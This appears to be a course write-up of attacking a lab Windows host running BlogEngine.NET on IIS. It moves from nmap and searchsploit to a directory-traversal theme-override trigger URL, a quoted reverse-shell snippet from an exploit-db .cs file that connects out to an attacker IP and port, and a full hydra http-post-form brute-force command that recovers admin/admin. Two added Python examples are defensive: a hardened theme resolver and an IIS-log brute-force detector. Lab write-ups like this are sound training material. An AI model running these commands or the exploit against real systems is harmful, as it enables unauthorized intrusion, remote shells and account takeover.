This challenge is at the 7/10 mark, and this module name already appeared on Day 19; yes, it is the target machine that had gone missing. When the nmap scan finished, nmap suggested **-Pn**: the host is very likely a Windows system, so it cannot be discovered with ICMP.
```
┌──(kali㉿vbox)-[~]
└─$ sudo nmap -Pn -T4 172.16.x.x
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-29 03:53 EDT
Stats: 0:00:30 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 99.99% done; ETC: 03:53 (0:00:00 remaining)
Nmap scan report for 172.16.x.x
Host is up (0.37s latency).
Not shown: 996 filtered tcp ports (no-response)
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
8888/tcp open  sun-answerbook
Nmap done: 1 IP address (1 host up) scanned in 30.81 seconds
```

```
┌──(kali㉿vbox)-[~]
└─$ sudo nmap -sC -sV -Pn -p8888 172.16.x.x
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-29 03:48 EDT
Nmap scan report for 172.16.x.x
Host is up (0.57s latency).
PORT     STATE SERVICE VERSION
8888/tcp open  http    Microsoft IIS httpd 10.0
|_http-title: 403 - \xB8T\xA4\xEE: \xA9\xDA\xB5\xB4\xA6s\xA8\xFA\xA1C
| http-methods:
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
| http-robots.txt: 1 disallowed entry
|_/BlogEngine
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 22.48 seconds
```
Day two of the training course was similar to what we did earlier: it builds an SOP for turning everyone into an attacker, so the pre-assessment homework was reused for practice. I still don't know why the scan failed when I was writing the post a few days ago. I had originally wanted to show the process of going from 0 to 1 as an attacker, comparing how I attacked the pre-assessment target with how the instructor teaches it, which is an important reference. But I should count myself lucky that their target machine is still up and reachable 😊

The instructor's SOP as established in class is as follows (it includes a few tools I had never heard of):

From my own HTB experience I have one extra habit: checking robots.txt. Like whatweb, it may reveal some information, but most of the time it isn't useful.
```
┌──(kali㉿vbox)-[~]
└─$ curl 172.16.x.x:8888/robots.txt
User-agent: *
Disallow: /BlogEngine
```
The second day's course actually ended this unit right here and moved on to playing with the hydra tool to guess passwords. In class I noticed that some students did not understand how web systems work, so let me single this out: the admin/admin found so far can only be used to log into the site's admin backend. In terms of HTB training, the work is divided into the following four stages.

So for this target, after obtaining the site administrator's credentials: first, browse around to see where a shell could be planted, looking for an XSS to plant it through. Next, go back to the instructor's step 5 and see what Google says; someone may already have reproduced a vulnerability in this CMS that can be used as a reference. What I learned from HTB is the searchsploit command, which searches exploit-db without having to log in to the site.
```
┌──(kali㉿vbox)-[~]
└─$ searchsploit BlogEngine
--------------------------------------------- ---------------------------------
 Exploit Title                               | Path
--------------------------------------------- ---------------------------------
BlogEngine 3.3 - 'syndication.axd' XML Exter | xml/webapps/48422.txt
BlogEngine 3.3 - XML External Entity Injecti | windows/webapps/46106.txt
BlogEngine 3.3.8 - 'Content' Stored XSS      | aspx/webapps/48999.txt
BlogEngine.NET 1.4 - 'search.aspx' Cross-Sit | asp/webapps/32874.txt
BlogEngine.NET 1.6 - Directory Traversal / I | asp/webapps/35168.txt
BlogEngine.NET 3.3.6 - Directory Traversal / | aspx/webapps/46353.cs
BlogEngine.NET 3.3.6/3.3.7 - 'dirPath' Direc | aspx/webapps/47010.py
BlogEngine.NET 3.3.6/3.3.7 - 'path' Director | aspx/webapps/47035.py
BlogEngine.NET 3.3.6/3.3.7 - 'theme Cookie'  | aspx/webapps/47011.py
BlogEngine.NET 3.3.6/3.3.7 - XML External En | aspx/webapps/47014.py
--------------------------------------------- ---------------------------------
Shellcodes: No Results
```
After trying all of them, I finally chose BlogEngine.NET 3.3.6 - Directory Traversal / | aspx/webapps/46353.cs. Its description explains how the vulnerability is triggered:
```
- Finally, the vulnerability is triggered by accessing the base URL for the
- blog with a theme override specified like so:
- http://10.10.10.10/?theme=../../App_Data/files
```
The following lines in the .cs file need to be changed to your own IP and port for nc to use; this part stops here for now. Normally you cannot expect to always run into admin/admin, so the next post goes back a little to an earlier point: how do you guess a password when it is not the default? The instructor in class also stressed that password guessing is the last resort! It is just that when a system vulnerability requires logging in before it can be exploited, and the default credentials have been changed, guessing the credentials is the only option left.
```csharp
using(System.Net.Sockets.TcpClient client = new System.Net.Sockets.TcpClient("10.10.10.20", 4445)) {
    using(System.IO.Stream stream = client.GetStream()) {
```
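To show why the exploit's theme override walks out of the theme directory, here is an added Python example of my own; it is not code from BlogEngine.NET, from the course, or from the exploit-db entry. It contrasts the weak pattern of joining the request parameter onto the theme root unchecked with a hardened resolver that decodes first, accepts only a single plain path segment from an allowlist of installed themes, and confirms the normalised path is still under the theme root. The directory layout (/srv/site/Custom/Themes), the theme name Standard and the helper names are assumptions for the example; only the theme parameter and the App_Data name come from the exploit text quoted above.

```python
import posixpath
from typing import Iterable, Optional
from urllib.parse import parse_qs

# Constructed layout for the example; only the theme parameter and App_Data come from the exploit text.
WEB_ROOT = "/srv/site"
THEMES_ROOT = posixpath.join(WEB_ROOT, "Custom", "Themes")
INSTALLED_THEMES = ("Standard",)  # assumed allowlist of themes actually present on disk


def resolve_theme_naive(theme: str) -> str:
    """The weak pattern: the request parameter is joined onto the theme root unchecked,
    so '..' segments walk out of the theme directory."""
    return posixpath.normpath(posixpath.join(THEMES_ROOT, theme))


def is_under(path: str, root: str) -> bool:
    """True when the normalised path is root itself or lies beneath it."""
    root = posixpath.normpath(root)
    return posixpath.commonpath([posixpath.normpath(path), root]) == root


def resolve_theme_safe(theme: Optional[str], installed: Iterable[str] = INSTALLED_THEMES) -> Optional[str]:
    """Hardened resolver: one plain segment, on the allowlist, and still inside THEMES_ROOT."""
    if not theme or "/" in theme or "\\" in theme or theme in (".", ".."):
        return None  # backslash matters too: IIS treats it as a path separator
    if theme not in set(installed):
        return None
    candidate = posixpath.normpath(posixpath.join(THEMES_ROOT, theme))
    return candidate if is_under(candidate, THEMES_ROOT) else None


def theme_from_query(query: str) -> Optional[str]:
    """Extract the decoded theme parameter; validation must run after decoding, since
    '..%2F..%2F' only becomes '../../' once the URL encoding is removed."""
    values = parse_qs(query).get("theme")
    return values[0] if values else None


if __name__ == "__main__":
    probe = theme_from_query("theme=..%2F..%2FApp_Data%2Ffiles")
    naive = resolve_theme_naive(probe)
    print("naive :", naive, "| inside web root:", is_under(naive, WEB_ROOT),
          "| inside themes:", is_under(naive, THEMES_ROOT))
    print("safe  :", resolve_theme_safe(probe))
    print("safe  :", resolve_theme_safe(theme_from_query("theme=Standard")))
```

The containment check has to be made against the directory the parameter is supposed to select from: `../../App_Data/files` still lies inside the web root, so a check against the site root alone would let it through.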
For password guessing I more often use hydra, and it usually turns up nothing, but this challenge requires setting up Burp Suite. The way to understand it: hydra can brute-force passwords for connections made with commands such as ssh or smb, but BlogEngine here is a web service, so guessing takes a bit more effort. I'll skip the installation part and just turn on the Burp Suite proxy to intercept what the login form sends.
http://172.16.x.x:8888/BlogEngine/Account/login.aspx

```http
POST /BlogEngine/Account/login.aspx?ReturnURL=%2fBlogEngine%2fadmin%2f HTTP/1.1
Host: 172.16.x.x:8888
Content-Length: 610
Cache-Control: max-age=0
Accept-Language: zh-TW
Upgrade-Insecure-Requests: 1
Origin: http://172.16.x.x:8888
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.6533.100 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://172.16.x.x:8888/BlogEngine/Account/login.aspx?ReturnURL=/BlogEngine/admin/
Accept-Encoding: gzip, deflate, br
Connection: keep-alive

__VIEWSTATE=9w0Aga2URZktOr2CJtvW%2B15ic10jp40maFSqKQ2mrsGeXikCcbHgdF2JqAJEvEPJ8yd3m7Pt364kkuqaQJwoUgeSWjnEHe95IKi4eHDHF%2B5wJma6JMHFFnLLpm%2FS7rm5O%2Boqga%2B582i0vnD4j6MZ4JaoX2ImcWxm2tdeafmqhXy0GxOF&__VIEWSTATEGENERATOR=F75D4323&__EVENTVALIDATION=YJCJTlug3YiA0ROziuZWld9mFX9NQv73SuPiRdJunQFVPt%2F%2B9j%2Btbpx2rme%2B2OoyFLdBJOLZMUDgKXR5CsgwxADu%2FTWLM7DwtdWKDKW7j3a8fjZ6QiMqZ3N%2FnoRcJb8cwQD%2B%2BQNedaiLQ68yS3g2Drdg5a%2ByXh3TEKWCQSqRevIpH0qR&ctl00%24MainContent%24LoginUser%24UserName=username&ctl00%24MainContent%24LoginUser%24Password=password&ctl00%24MainContent%24LoginUser%24LoginButton=%E7%99%BB%E5%85%A5
```
We first need to find the keyword that appears on the failed-login page, here "Login failed" (the error message will not necessarily say that). Then, in the POST captured by Burp Suite, locate this part: LoginUser%24UserName=username&ctl00%24MainContent%24LoginUser%24Password=password, and replace the username and password with ^USER^ and ^PASS^. This password is not difficult, so it should be cracked very quickly.
```
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2024-09-30 11:04:23
[ERROR] the variables argument needs at least the strings ^USER^, ^PASS^, ^USER64^ or ^PASS64^

└─$ hydra -l admin -P /usr/share/seclists/Passwords/xato-net-10-million-passwords-100000.txt 172.16.x.x http-post-form "/BlogEngine/Account/login.aspx?ReturnURL=%2fBlogEngine%2fadmin%2f:__VIEWSTATE=HM6WjiJeuA8aoKm0YG43iBU54MOqCPlOua7%2Fd%2BOuuk7Tfoqz%2F8aI039%2FwoSLzNTnqhdDj2SmIGG5kUmtmcEa%2ByvRe0EK6gxaSOc2Jf62eLhZZZIge2msAUdAATL25yh4pj0CT4CsXwfo6rFg%2Fl38sUwDOQKuc2RH6POW3GJ16MN43Eyi&__VIEWSTATEGENERATOR=F75D4323&__EVENTVALIDATION=63WpDhcildbumqgZO7hirCpbguDVAwYA82zXiFliPQg60hwhd5FgsoHqSJw%2FIPe1FSf5288%2FnDUw%2FwqqlHpOF%2FJ77%2FjFeMnyPuaVHiO9J1GgghW00jc3KUuNFLqD1AQZVAjdGRIkcYZctw6v0KS%2BupqorC7BZKe8eW%2FbycfvyrpPIi7F&ctl00%24MainContent%24LoginUser%24UserName=^USER^&ctl00%24MainContent%24LoginUser%24Password=^PASS^&ctl00%24MainContent%24LoginUser%24LoginButton=Log+in:Login failed" -s 8888
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2024-09-30 11:05:45
[WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 16 tasks per 1 server, overall 16 tasks, 100000 login tries (l:1/p:100000), ~6250 tries per task
[DATA] attacking http-post-form://172.16.x.x:8888/BlogEngine/Account/login.aspx?ReturnURL=%2fBlogEngine%2fadmin%2f:__VIEWSTATE=HM6WjiJeuA8aoKm0YG43iBU54MOqCPlOua7%2Fd%2BOuuk7Tfoqz%2F8aI039%2FwoSLzNTnqhdDj2SmIGG5kUmtmcEa%2ByvRe0EK6gxaSOc2Jf62eLhZZZIge2msAUdAATL25yh4pj0CT4CsXwfo6rFg%2Fl38sUwDOQKuc2RH6POW3GJ16MN43Eyi&__VIEWSTATEGENERATOR=F75D4323&__EVENTVALIDATION=63WpDhcildbumqgZO7hirCpbguDVAwYA82zXiFliPQg60hwhd5FgsoHqSJw%2FIPe1FSf5288%2FnDUw%2FwqqlHpOF%2FJ77%2FjFeMnyPuaVHiO9J1GgghW00jc3KUuNFLqD1AQZVAjdGRIkcYZctw6v0KS%2BupqorC7BZKe8eW%2FbycfvyrpPIi7F&ctl00%24MainContent%24LoginUser%24UserName=^USER^&ctl00%24MainContent%24LoginUser%24Password=^PASS^&ctl00%24MainContent%24LoginUser%24LoginButton=Log+in:Login failed
[8888][http-post-form] host: 172.16.x.x   login: admin   password: admin
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2024-09-30 11:06:35
```
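Seen from the defender's side, a hydra run like the one above leaves an unmistakable trace in the IIS log: a burst of POSTs to login.aspx from a single client. The following is an added Python example of my own, not from the course or from the page, that parses an IIS W3C log excerpt and flags a client whose login POSTs within a sliding window reach a threshold. The log lines are constructed sample data. The example assumes, as is typical for ASP.NET forms login, that a failed attempt re-renders the page with HTTP 200 while a success redirects (302) to ReturnURL, and it treats hydra's stock User-Agent `Mozilla/4.0 (Hydra)` as a secondary indicator only, since the H= option replaces it. The field layout, threshold, window and IP addresses are assumptions.

```python
from collections import defaultdict, deque
from datetime import datetime, timedelta
from typing import Dict, Iterator, List

# IIS paths are case-insensitive, so the stem is compared lowercased.
LOGIN_STEM = "/blogengine/account/login.aspx"
WINDOW = timedelta(seconds=60)   # sliding window (assumed tuning value)
THRESHOLD = 20                   # login POSTs from one client within WINDOW


def _build_sample_log() -> str:
    """Constructed IIS W3C log excerpt: sample data, not taken from any real server."""
    header = [
        "#Software: Microsoft Internet Information Services 10.0",
        "#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port "
        "cs-username c-ip cs(User-Agent) sc-status sc-substatus sc-win32-status time-taken",
    ]
    stem = "/BlogEngine/Account/login.aspx"
    query = "ReturnURL=%2fBlogEngine%2fadmin%2f"
    browser = "Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)"  # IIS writes spaces as '+'
    hydra = "Mozilla/4.0+(Hydra)"  # hydra's stock User-Agent unless overridden with H=
    lines = [
        # a legitimate user: one mistyped password (200), then a successful login (302 to ReturnURL)
        f"2024-09-30 15:03:00 172.16.0.10 GET {stem} {query} 8888 - 172.16.0.50 {browser} 200 0 0 95",
        f"2024-09-30 15:03:05 172.16.0.10 POST {stem} {query} 8888 - 172.16.0.50 {browser} 200 0 0 140",
        f"2024-09-30 15:03:30 172.16.0.10 POST {stem} {query} 8888 - 172.16.0.50 {browser} 302 0 0 160",
    ]
    # a dictionary attack: 25 failed POSTs one second apart, then the guess that succeeds
    for i in range(25):
        lines.append(f"2024-09-30 15:05:{i:02d} 172.16.0.10 POST {stem} {query} 8888 - "
                     f"172.16.0.77 {hydra} 200 0 0 130")
    lines.append(f"2024-09-30 15:05:25 172.16.0.10 POST {stem} {query} 8888 - "
                 f"172.16.0.77 {hydra} 302 0 0 150")
    return "\n".join(header + lines) + "\n"


SAMPLE_LOG = _build_sample_log()


def parse_iis_w3c(text: str) -> Iterator[Dict[str, str]]:
    """Yield one dict per request line, keyed by the names in the #Fields: directive."""
    fields: List[str] = []
    for raw in text.splitlines():
        if raw.startswith("#Fields:"):
            fields = raw.split()[1:]       # the directive can change mid-file after a restart
            continue
        if not raw or raw.startswith("#"):
            continue
        values = raw.split(" ")            # W3C fields never contain spaces (encoded as '+')
        if fields and len(values) == len(fields):
            yield dict(zip(fields, values))


def detect_login_bruteforce(text: str, window: timedelta = WINDOW,
                            threshold: int = THRESHOLD) -> Dict[str, dict]:
    """Flag clients whose login POSTs within `window` reach `threshold`.

    A failed ASP.NET forms login still answers 200, so the status code alone cannot
    separate failures from successes; the rate is the signal, and a 302 after the
    flag is the hint that one of the guesses worked."""
    recent: Dict[str, deque] = defaultdict(deque)
    alerts: Dict[str, dict] = {}
    for rec in parse_iis_w3c(text):
        if rec["cs-method"] != "POST" or rec["cs-uri-stem"].lower() != LOGIN_STEM:
            continue
        ip = rec["c-ip"]
        ts = datetime.strptime(f"{rec['date']} {rec['time']}", "%Y-%m-%d %H:%M:%S")
        q = recent[ip]
        q.append(ts)
        while ts - q[0] > window:          # drop attempts that fell out of the window
            q.popleft()
        if ip in alerts:
            alerts[ip]["total_attempts"] += 1
            if rec["sc-status"] == "302":
                alerts[ip]["redirect_after_flag"] = True
        elif len(q) >= threshold:
            alerts[ip] = {
                "flagged_at": ts,
                "attempts_in_window": len(q),
                "total_attempts": len(q),
                "hydra_user_agent": "hydra" in rec["cs(User-Agent)"].lower(),
                "redirect_after_flag": False,
            }
    return alerts


if __name__ == "__main__":
    for ip, info in detect_login_bruteforce(SAMPLE_LOG).items():
        print(f"{ip}: flagged at {info['flagged_at']:%H:%M:%S}, "
              f"{info['attempts_in_window']} POSTs in window, total {info['total_attempts']}, "
              f"hydra UA={info['hydra_user_agent']}, redirect after flag={info['redirect_after_flag']}")
```

The threshold is deliberately far above what a person mistyping a password produces, and the sliding window keeps a slow, patient run from being hidden by the file's total length; a lockout or rate limit on the login form itself is the mitigation this detection points at.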